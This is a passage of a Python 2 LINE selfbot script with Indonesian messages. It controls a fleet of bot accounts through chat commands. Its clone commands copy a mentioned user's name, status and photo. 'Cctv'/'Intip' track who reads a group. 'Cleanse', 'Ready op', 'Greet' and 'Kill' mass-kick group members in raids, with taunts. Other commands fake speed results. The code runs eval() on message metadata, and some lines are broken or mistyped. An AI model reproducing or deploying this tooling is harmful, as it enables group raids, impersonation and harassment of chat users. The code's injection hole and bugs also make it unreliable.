image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
#===============================================
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["zzz","Bot speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.00009)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Speed respon" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Sp turunin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Sp naikin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.1)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Turun lagi" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.5)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Spbot" in msg.text:
if msg.from_ in admin:
time.sleep(0.5)
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(2.32)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Sp asli"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "Sek")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed asli executed"
elif msg.text in ["Speedbot","speedbot"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "loading...................")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = k1.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
k1.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = k1.getContact(target)
X = contact.displayName
profile = k1.getProfile()
profile.displayName = X
k1.updateProfile(profile)
k1.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = k1.getProfile()
lol.statusMessage = Y
k1.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
k1.updateProfilePicture(P)
except Exception as e:
k1.sendText(msg.to, "Failed!")
print e
#=================================================
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = k1.getProfile()
profile.displayName = x
k1.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kt.getProfile()
cak.statusMessage = y
k1.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
k1.updateProfilePicture(p)
k1.sendText(msg.to, "Succes")
except Exception as e:
k1.sendText(msg.to,"Gagagl!")
print e
#=================================================
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Cek CCTV di proses......")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
#print wait2
elif msg.text == "Toong":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
#print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "||Di Read Oleh||%s\n||By : ✰Ќriֆ✰ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰||\n\n>Pelaku CCTV<\n%s-=CCTV=-\n•Bintitan\n•Panuan\n•Kurapan\n•Kudisan\n\nAmiin Ya Allah\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Cctv dulu Koplak\nBaru Ketik Toong\nDASAR PIKUN ♪")
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Siap di intip....")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] Reset"
elif msg.text == "Intip":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print "[Command] Check"
chiya += rom[1] + "\n"
cl.sendText(msg.to, "✔ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰\nRead : %s\n\n✖ Sider :\n%s\nPoint creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] reset"
else:
cl.sendText(msg.to,"Read point tidak tersedia, Silahkan ketik Cctv untuk membuat Read point.")
#-----------------------------------------------
#---------------FUNGSI RATAIN GRUP TANPA KICK SESAMA BOT/Admin/Bots----------#
elif "Cleanse" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,k1,k2,k3,k4]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#-----------------------------------------------
#----------------Fungsi Join Group Start-----------------------#
elif msg.text in ["One piece","Kr asup","Asup"]: #Panggil Semua Bot
if msg.from_ in owner:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k4.sendText(msg.to,"Hello " + str(ginfo.name))
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Semua Sudah Lengkap"
elif msg.text in ["Kampret join"]:
if msg.form_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Luffy join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Zorro join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Sanji Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Fungsi Join Group Finish---------------#
#-------------Fungsi Leave Group Start---------------#
elif msg.text in ["Kabur all","Ampih"]: #Bot Ninggalin Group termasuk Bot Induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
k5.leaveGroup(msg.to)
cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Kabur"]: #Semua Bot Ninggalin Group Kecuali Bot Induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
k5.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
k5.leaveGroup(msg.to)
#cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye zorro"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye sanji"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Ussop"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe1"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe2"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe3"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
#-------------Fungsi Leave Group Finish---------------#
#-------------Fungsi Tag All Start---------------#
elif msg.text in ["Emak"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Abah"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention2(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention2(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention2(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention2(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention2(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention2(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif msg.text in ["Crot"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention2(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention2(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention2(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention2(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention2(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention2(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members\n\nCrot... crot... aww.. Muncrat...!!!"
cnt.to = msg.to
cl.sendMessage(cnt)
#-------------Fungsi Tag All Finish---------------#
elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
likePost()
except:
pass
elif msg.text in ["Like temen", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Teman Boss")
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
autolike()
except:
pass
#----------------Fungsi Banned Kick Target Start-----------------------#
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = random.choice(KAC).getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Selamat tinggal")
random.choice(KAC).sendText(msg.to,"Jangan masuk lagidevil smile")
return
for jj in matched_list:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Fungsi Banned Kick Target Finish----------------------#
elif "Ready op" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Ready op","")
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
random.choice(KAC).sendText(msg.to,"Eh Ini Room apaan?")
random.choice(KAC).sendText(msg.to,"Ratain aja lah\nRoom Ga Berguna..")
random.choice(KAC).sendText(msg.to,"Jangan Baper yah Tollll;")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
random.choice(KAC).sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[cl,ki,kk,kc,ks,k1,k2,k3,k4]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Koq Ga Ditangkis Wooyyy?\Lemah Banget Nih Room")
elif "Greet" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Greet","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
ks.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,kk,kc,ks,k1,k2,k3,k4]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleanse")
kk.sendText(msg.to,"Group cleanse")
kc.sendText(msg.to,"Group cleanse")
elif msg.text in ["Salam1"]:
ki.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kk.sendText(msg.to,"Assalamu'alaikum")
elif msg.text in ["Salam2"]:
ki.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kk.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
elif "Salam3" in msg.text:
if msg.from_ in owner:
ki.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kk.sendText(msg.to,"Assalamu'alaikum")
ki.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
kk.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Salam3","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
